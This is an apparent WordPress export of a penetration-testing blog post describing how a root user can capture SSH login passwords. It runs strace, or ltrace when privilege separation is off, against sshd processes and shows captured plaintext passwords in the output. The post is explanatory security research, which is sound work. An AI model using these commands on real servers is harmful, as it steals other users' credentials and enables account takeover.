{"id":16,"date":"2007-06-24T22:13:14","date_gmt":"2007-06-24T22:13:14","guid":{"rendered":"http:\/\/pentestmonkey.net\/?p=16"},"modified":"2011-08-20T16:02:54","modified_gmt":"2011-08-20T16:02:54","slug":"sshd-snooping","status":"publish","type":"post","link":"https:\/\/pentestmonkey.net\/blog\/sshd-snooping","title":{"rendered":"Stealing Usernames and Passwords from SSHD"},"content":{"rendered":"

I just read a really cool blog post<\/a> by Sebastian Krahmer. He discusses a post-exploitation technique to snoop on incoming SSH sessions – including the username and password used to authenticate.<\/p>\n

<\/p>\n

Sebastian discusses OpenSSH running with the “Privilege Separation” option turned on (the default).<\/p>\n

In this mode several sshd processes are created when an incoming connection is made.\u00a0 The lower-privileged process needs to send the supplied username and password to the higher-privileged process in order for it to be verified.\u00a0 It is during this inter-process communication that the snooping occurs.<\/p>\n

The proof-of-concept code attaches to the sshd process, waits for it to fork, then traps system calls within the child process.\u00a0 When the child uses the “read” and “write” system calls to communicate with the parent process, the password is revealed.\u00a0 Screenshots are included in the original post<\/a>.<\/p>\n

We can recreate the process by hand using a locally configured ssh daemon, an ssh client and the strace program to trap system calls.<\/p>\n

First we connect to the ssh daemon.\u00a0 This causes it to fork:<\/p>\n

$ ssh pm@localhost<\/pre>\n

Wait for the “password:” prompt, then in another session look for the sshd [priv] process.<\/p>\n

# ps aux | grep ssh\r\nroot\u00a0\u00a0\u00a0\u00a0\u00a0 7015\u00a0 0.0\u00a0 0.0\u00a0 23720\u00a0\u00a0 456 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ss\u00a0\u00a0 Apr16\u00a0\u00a0 0:00 \/usr\/sbin\/sshd\r\npm\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 27870\u00a0 0.0\u00a0 0.0\u00a0 22584\u00a0 2056 pts\/5\u00a0\u00a0\u00a0 S+\u00a0\u00a0 19:44\u00a0\u00a0 0:00 ssh localhost\r\nroot\u00a0\u00a0\u00a0\u00a0 27871\u00a0 0.1\u00a0 0.0\u00a0 33476\u00a0 2172 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ss\u00a0\u00a0 19:44\u00a0\u00a0 0:00 sshd: pm [priv]\r\nsshd\u00a0\u00a0\u00a0\u00a0 27872\u00a0 0.0\u00a0 0.0\u00a0 25060\u00a0\u00a0 888 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 S\u00a0\u00a0\u00a0 19:44\u00a0\u00a0 0:00 sshd: pm [net]\r\nroot\u00a0\u00a0\u00a0\u00a0 27873\u00a0 0.0\u00a0 0.0\u00a0 33476\u00a0\u00a0 692 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 S\u00a0\u00a0\u00a0 19:44\u00a0\u00a0 0:00 sshd: pm [pam]<\/pre>\n

Now strace it (you need to be root).\u00a0 Then go back to the ssh client and type in a password.\u00a0 You’ll see your password being passed between the sshd processes…<\/p>\n

# strace -p 27871\r\nProcess 27871 attached - interrupt to quit\r\nread(6, \"???27\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 4\r\nread(6, \"4???1???16verysecurepass\", 23) = 23\r\nwrite(4, \"???236\", 5)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 5\r\nwrite(4, \"???16verysecurepass\", 18) = 18\r\nwrite(6, \"????055\", 5)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 5\r\nwrite(6, \"???1\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 4\r\nread(6, \"???1\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 4<\/pre>\n

The PoC automates the above process.\u00a0 Very cool.<\/p>\n

What if Privilege Separation isn’t being used?<\/h3>\n

If Privilege Separation is turned off the above technique doesn’t work, because system calls aren’t used to send the unencrypted logon credentials.\u00a0 It’s still possible to see credentials being passed around via library calls using the ltrace tool, though.\u00a0 The password sent in this example was lots of x’s:<\/p>\n

# ps aux | grep sshd\r\n\u00a0root\u00a0\u00a0\u00a0\u00a0\u00a0 7640\u00a0 0.0\u00a0 0.0\u00a0\u00a0 5128\u00a0\u00a0 724 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ss\u00a0\u00a0 19:46\u00a0\u00a0 0:00 \/usr\/sbin\/sshd<\/pre>\n
# sudo ltrace -f -p 7640\r\n...\r\n[pid 7658] HMAC_Update(0xbfff88d8, 0x80ae4d8, 128, 0x4222f7a0, 0x7a4e3342)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 1\r\n[pid 7658] HMAC_Final(0xbfff88d8, 0x80a1260, 0, 0x4222f7a0, 0x7a4e3342)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 1\r\n[pid 7658] HMAC_CTX_cleanup(0xbfff88d8, 0x80a1260, 0, 0x4222f7a0, 0x7a4e3342)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0xbfff88d8\r\n[pid 7658] memcpy(0xbfff899b, \"=\", 1)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0xbfff899b\r\n[pid 7658] free(0x80aa708)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = <void>\r\n[pid 7658] memcpy(0xbfffa984, \"\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0xbfffa984\r\n[pid 7658] calloc(1, 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80aa708\r\n[pid 7658] memcpy(0xbfffa954, \"\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0xbfffa954\r\n[pid 7658] malloc(34)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b4940\r\n[pid 7658] memcpy(0x80b4940, \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"..., 33)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b4940\r\n[pid 7658] malloc(4096)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b8440\r\n[pid 7658] memcpy(0x80b8440, \"\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b8440\r\n[pid 7658] memcpy(0x80b8444, \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"..., 33)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b8444\r\n...<\/pre>\n

So what does it all mean?<\/h3>\n

If you get root on a box during a pentest, you can snoop on processes.\u00a0 No surprises or anything new here really.\u00a0 However, I thought it was really cool to see a practical and relatively safe way of automating such snooping – no trojaning of binaries, no risky patching of programs in memory.\u00a0 Great post Sebastian.<\/p>\n

 <\/p>\n","protected":false},"excerpt":{"rendered":"

I just read a really cool blog post by Sebastian Krahmer. He discusses a post-exploitation technique to snoop on incoming SSH sessions – including the username and password used to authenticate.<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5],"tags":[19,59],"_links":{"self":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/16"}],"collection":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/comments?post=16"}],"version-history":[{"count":2,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/16\/revisions"}],"predecessor-version":[{"id":149,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/16\/revisions\/149"}],"wp:attachment":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/media?parent=16"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/categories?post=16"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/tags?post=16"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}